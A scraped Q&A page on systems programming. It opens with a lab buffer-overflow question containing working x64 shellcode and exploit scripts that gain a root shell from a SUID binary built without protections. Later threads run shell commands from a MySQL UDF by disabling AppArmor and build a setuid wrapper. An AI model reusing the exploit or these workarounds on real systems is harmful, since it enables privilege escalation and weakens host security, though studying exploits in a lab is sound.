Buffer overflow exploit only working using pwntools - python

I am attempting to create a buffer-overflow on a simple x64 C binary without any protections (i.e. ASLR, canary, PIE, NX, Parial RelRO, Fortify). I am using an (updated) x64 Kali Linux 2020.4 distro (in vmware using the vmware image from the official offensive security website). I am compiling the program as root and I am enabling the SUID bit to access the program with root privilidges from an unpriviledged account. The code of the vulnerable program (example.c) is the following:
#include<stdio.h>
#include<string.h>
void vuln_func();
int main(int argc, char *argv[])
{
printf("Hi there!\n");
vuln_func();
}
void vuln_func()
{
char buffer[256];
gets(buffer);
}
and to compile the program I am using the following Makefile:
all:
gcc -no-pie -fno-stack-protector example.c -o example -D_FORTIFY_SOURCE=0
clean:
rm example
Using python3's pwntools to create an exploit works just fine and I get a root shell.
from pwn import *
nopsled = b"\x90"*100
shellcode = b"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x48\x31\xc0\x48\x89\xc2\x48\x89\xd6\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x48\x83\xc0\x3b\x0f\x05"
padding = b"A"*(256-len(shellcode)-len(nopsled))
padding += b"B"*8
padding += p64(0x7fffffffdec4)
payload = nopsled + shellcode + padding
p = process("./example")
p.recv()
p.sendline(payload)
p.interactive()
but when I am using the exact same payload on python2 without using pwntools it doesn't.
import struct
nopsled = "\x90"*100
shellcode = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x48\x31\xc0\x48\x89\xc2\x48\x89\xd6\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x48\x83\xc0\x3b\x0f\x05"
padding = "A"*(256-len(shellcode)-len(nopsled))
padding += "B"*8
padding += struct.pack("Q", 0x7fffffffdec4)
payload = nopsled + shellcode + padding
print payload
and then running it using:
$(python exploit.py; cat) | ./example
The cat command "catches" the stdin but when I provide commands nothing happens.
┌──(kali㉿kali)-[~/Desktop/boe/example]
└─$ $(python exploit.py ; cat) | ./example
Hi there!
whoami
id
^C
┌──(kali㉿kali)-[~/Desktop/boe/example]
└─$
What is really weird is that when adding an "\xCC" byte before the shellcode,
shellcode = "\xcc\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x48\x31\xc0\x48\x89\xc2\x48\x89\xd6\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x48\x83\xc0\x3b\x0f\x05"
I get a sigtrap message like that:
┌──(kali㉿kali)-[~/Desktop/boe/example]
└─$ python exploit.py | ./example
Hi there!
zsh: done python exploit.py |
zsh: trace trap ./example
Any ideas why that happens?

Related

MySQL UDF Plugin cannot Execute Shell Commands (with system() or execl())

I am running a User Defined Function plugin for MySQL. The program works fine except for when you do a system call. I need to do a system call in order to call a Python3 script!
All of the system calls that I do, with system() or execl(), all return -1 and fail.
Does anybody know how to make my C library MySQL UDF plugin able to execute shell commands? We are completely stuck with this, thanks!
Here is the C code that I a having issues with:
# Written in C Language
#include <string.h>
#include <stdio.h>
#include <mysql.h>
bool udf_callpython_init(UDF_INIT *initid, UDF_ARGS *args, char *message) {
// None of these work...
int systemResult = system("echo hello");
//int systemResult = execl("/bin/bash", "bash", "-c", "echo hello again...", (char *) NULL);
//int systemResult = execl("/bin/ls", "ls", "-l", (char*)0);
//int systemResult = system("python3 python_script.py")
char str[100];
sprintf(str, "%d", systemResult);
strcpy(message, str);
return 1;
}
char* udf_callpython(UDF_INIT *initid, UDF_ARGS *args,
char *result, unsigned long *length,
char *is_null, char *error) {
system("echo test > does_not_work.txt");
strcpy(result, "Hello, World!");
*length = strlen(result);
return result;
}
This is how I compiled this code:
gcc -o udf_callpython.so udf_callpython.c -I/usr/include/mysql/ -L/usr/include/mysql/ -shared -fPIC
I then copy that .so library file to mysql's plugin directory:
sudo cp udf_callpython.so /usr/lib/mysql/plugin/
I then create the function in MySQL like this:
CREATE FUNCTION udf_callpython RETURNS STRING SONAME "udf_callpython.so";
I then have this procedure to call this UDF:
DELIMITER $$
$$
USE test_db
$$
CREATE PROCEDURE example_insert_proc()
BEGIN
DECLARE result VARCHAR(255);
SET result = udf_callpython();
END;$$
DELIMITER ;
Then, on the output, you will see -1:
mysql> CALL example_insert_proc();
ERROR 1123 (HY000): Can't initialize function 'udf_callpython'; -1
(EDIT:)
I found that the errno is 13, which is Permission denied.
I figured out this issue! I am answering this is case anybody else has the same problem...
I disabled AppArmor (Ubuntu 20.04):
sudo systemctl disable apparmor
sudo reboot now
If you then rerun the stored procedure, the system() call succeeds:
mysql> CALL example_insert_proc();
ERROR 1123 (HY000): Can't initialize function 'udf_callpython'; 0
mysql>

After Effects: How to launch an external process and detach it

I've got an After Effects Scripting question, but I'm not sure it will be resolved with AE knowledge, maybe more with standalone development.
I want to launch an external process from After Effects, actually I want to launch a render of the openned AEP file with the aerender.exe provided with After Effects while keeping it usable.
var projectFile = app.project.file;
var aeRender = "C:\\Program Files\\Adobe\\Adobe After Effects CC 2018\\Support Files\\aerender.exe";
var myCommand = "-project" + " " + projectFile.fsName;
system.callSystem("cmd /c \""+aeRender+"\"" + " " + myCommand);
So I wrote this simple JSX code and it works, it renders the scene render queue properly.
But After Effects is freezing, it waits for the end of the process.
I want it to stay usable.
So I tried to write a .cmd file and launch it with AE system.callSystem and I got the same problem,
I tried to go through an .exe file (compiled from a simple python with pyInstaller), same problem :
import sys
import subprocess
arg = sys.argv
pythonadress = arg[0]
aeRender = arg[1]
projectFileFSname = arg[2]
myCommand = "-project" + " " +projectFileFSname
callSystem = "cmd /c \""+aeRender +"\"" + " " + myCommand
subprocess.run(callSystem)
I even tried with "cmd /c start ", and it seems to be worse as After Effects continue freezing after the process is completed.
Is there a way to make AE believe the process is complete while it's actually not ?
Any help would be very apreciated !
system.callSystem() will freeze the script's execution so instead, you can dynamically create a .bat file and run it with .execute().
Here's a sample .js:
var path = {
"join": function ()
{
if (arguments.length === 0) return null;
var args = [];
for (var i = 0, iLen = arguments.length; i < iLen; i++)
{
args.push(arguments[i]);
}
return args.join(String($.os.toLowerCase().indexOf('win') > -1 ? '\\' : '/'));
}
};
if (app.project.file !== null && app.project.renderQueue.numItems > 0)
{
var
// aeRenderPath = path.join(new File($._ADBE_LIBS_CORE.getHostAppPathViaBridgeTalk()).parent.fsName, 'aerender.exe'), // works only in CC 2018 and earlier
aeRenderPath = path.join(new File(BridgeTalk.getAppPath(BridgeTalk.appName)).parent.fsName, 'aerender.exe'),
batFile = new File(path.join(new File($.fileName).parent.fsName, 'render.bat')),
batFileContent = [
'"' + aeRenderPath + '"',
"-project",
'"' + app.project.file.fsName + '"'
];
batFile.open('w', undefined, undefined);
batFile.encoding = 'UTF-8';
batFile.lineFeed = 'Unix';
batFile.write(batFileContent.join(' '));
batFile.close();
// system.callSystem('explorer ' + batFile.fsName);
batFile.execute();
$.sleep(1000); // Delay the script so that the .bat file can be executed before it's being deleted
batFile.remove();
}
You can, of course, develop it further and make it OSX compatible, add more features to it .etc, but this is the main idea.
Here's a list with all the aerender options (if you don't already know them): https://helpx.adobe.com/after-effects/using/automated-rendering-network-rendering.html
Btw, $._ADBE_LIBS_CORE.getHostAppPathViaBridgeTalk() will get you the "AfterFX.exe" file path so you can get the "aerender.exe" path easier this way.
EDIT: $._ADBE_LIBS_CORE was removed in CC2019 so you can use BridgeTalk directly instead for CC 2019 and above.

How to send a single pipelined command to python using bash from a groovy script console (Jenkins)?

I am using the groovy script console as offered by Jenkins.
I have this nicely working line for a Jenkins slave (Windows based):
println "cmd /c echo print(\"this is a sample text.\") | python".execute().text
Now i want the functional equivalent for a Jenkins slave (Linux based).
So i started on the Linux command line and got this core command working for me:
bash -c 'echo print\(\"this is a sample text.\"\) | python'
Then i wrapped all of this console command line into a some more escape codes and invocation decoration - but by this it went to a no longer functional state:
println "bash -c \'echo print\\(\\\"this is a sample text.\\\"\\) | python\'".execute().txt
The result when running it is just this:
empty
I feel i am stuck at the moment due failing to solve the multitude of effecting escape character levels.
Whats wrong? How to solve it? (And maybe: why?)
PS: if unclear - i want (if possible at all) to stick to an one-liner as the initial item was.
If you don't need to pipe bash into python, maybe this suits your fancy?
['python','-c','print("this is a sample text")'].execute().text
If you do need it, try
['bash','-c', /echo print\(\"this is a sample text.\"\) | python/].execute().text
Using List's .execute() helps with clarifying what each argument is. The slashy-strings help by changing the escape-character.
print "bash -c 'echo \"print(\\\"this is a sample text.\\\")\" | python'"
Output:
bash -c 'echo "print(\"this is a sample text.\")" | python'
After digging around for some more while i found a somewhat platform-independent, error channel (stderr) aware and execution fault capable solution that even avoids OS specific components like bash/cmd.exe:
try {
def command = ['python', '-c', /print("this is a sample text.")/];
if (System.properties['os.name'].toLowerCase().contains('windows'))
{
command[2] = command[2].replaceAll(/\"/, /\\\"/)
}
println "command=" + command
def proc = command.execute()
def rc = proc.waitFor()
println "rc=" + rc
def err = proc.err.text
if( err != "" ) { print "stderr=" + err }
def out = proc.text
if( out != "" ) { print "stdout=" + out }
} catch(Exception e) {
println "exception=" + e
}
println ""

setuid/setgid wrapper for python script

I have a Python script that I wish to be able to be run as the system user guybrush with UID 200 and group guybrush with GID 200.
At the moment my Python script (located in /path/to/script.py) looks like this:
#!/usr/bin/env python2
import os
print "uid: %s" % os.getuid()
print "euid: %s" % os.getgid()
print "gid: %s" % os.geteuid()
print "egid: %s" % os.getegid()
My attempted C wrapper (scriptwrap.c) looks like this:
#include <unistd.h>
#include <sys/types.h>
int main(int argc, char *argv[]) {
setuid(geteuid());
setgid(getegid());
return execv("/path/to/script.py", argv);
}
I then compile, chown, and chmod the wrapper as follows:
$ gcc scriptwrap.c -o scriptwrap
$ chown guybrush:guybrush scriptwrap
$ chmod 6755 scriptwrap
Yet when I run scriptwrap, I get the following output:
uid: 1000
euid: 1000
gid: 200
egid: 200
So for some reason only the GID is being set (my normal UID is 1000). What can I do to fix this?
Edit: If I chown the script to root:root and run it, the UID, eUID, GID, and eGID are all set to 0.
Also, this is on Ubuntu 12.04.4 LTS.
Well I figured this out (and learnt a bit in the process). Embarrassingly my initial problem was caused by a typo in my Python script: I was printing out the GID under the label euid, and the eUID under the label gid. Oops.
So the eUID and eGID are actually set correctly - great. But the UID and GID still aren't set despite my use of setuid and setgid in the C wrapper.
It turns out that this is due to the behaviour of setuid and setgid differing based on whether you are root or not: If you are root and you call setuid, it sets your real UID and your effective UID to whatever you pass it in, if you are not root it just sets the effective UID (source). So my use of setuid (and setgid) are essentially no-ops.
However it is possible to set the real UID and GID by using the setreuid and setregid calls:
#include <unistd.h>
#include <sys/types.h>
int main(int argc, char *argv[]) {
setreuid(geteuid(), geteuid());
setregid(getegid(), getegid());
return execv("/path/to/script.py", argv);
}
Which results in the following output from the (corrected) Python script when run:
uid: 200
euid: 200
gid: 200
egid: 200

Run a python script with arguments

I want to call a Python script from C, passing some arguments that are needed in the script.
The script I want to use is mrsync, or multicast remote sync. I got this working from command line, by calling:
python mrsync.py -m /tmp/targets.list -s /tmp/sourcedata -t /tmp/targetdata
-m is the list containing the target ip-addresses.
-s is the directory that contains the files to be synced.
-t is the directory on the target machines where the files will be put.
So far I managed to run a Python script without parameters, by using the following C program:
Py_Initialize();
FILE* file = fopen("/tmp/myfile.py", "r");
PyRun_SimpleFile(file, "/tmp/myfile.py");
Py_Finalize();
This works fine. However, I can't find how I can pass these argument to the PyRun_SimpleFile(..) method.
Seems like you're looking for an answer using the python development APIs from Python.h. Here's an example for you that should work:
#My python script called mypy.py
import sys
if len(sys.argv) != 2:
sys.exit("Not enough args")
ca_one = str(sys.argv[1])
ca_two = str(sys.argv[2])
print "My command line args are " + ca_one + " and " + ca_two
And then the C code to pass these args:
//My code file
#include <stdio.h>
#include <python2.7/Python.h>
void main()
{
FILE* file;
int argc;
char * argv[3];
argc = 3;
argv[0] = "mypy.py";
argv[1] = "-m";
argv[2] = "/tmp/targets.list";
Py_SetProgramName(argv[0]);
Py_Initialize();
PySys_SetArgv(argc, argv);
file = fopen("mypy.py","r");
PyRun_SimpleFile(file, "mypy.py");
Py_Finalize();
return;
}
If you can pass the arguments into your C function this task becomes even easier:
void main(int argc, char *argv[])
{
FILE* file;
Py_SetProgramName(argv[0]);
Py_Initialize();
PySys_SetArgv(argc, argv);
file = fopen("mypy.py","r");
PyRun_SimpleFile(file, "mypy.py");
Py_Finalize();
return;
}
You can just pass those straight through. Now my solutions only used 2 command line args for the sake of time, but you can use the same concept for all 6 that you need to pass... and of course there's cleaner ways to capture the args on the python side too, but that's just the basic idea.
Hope it helps!
You have two options.
Call
system("python mrsync.py -m /tmp/targets.list -s /tmp/sourcedata -t /tmp/targetdata")
in your C code.
Actually use the API that mrsync (hopefully) defines. This is more flexible, but much more complicated. The first step would be to work out how you would perform the above operation as a Python function call. If mrsync has been written nicely, there will be a function mrsync.sync (say) that you call as
mrsync.sync("/tmp/targets.list", "/tmp/sourcedata", "/tmp/targetdata")
Once you've worked out how to do that, you can call the function directly from the C code using the Python API.

Categories

Resources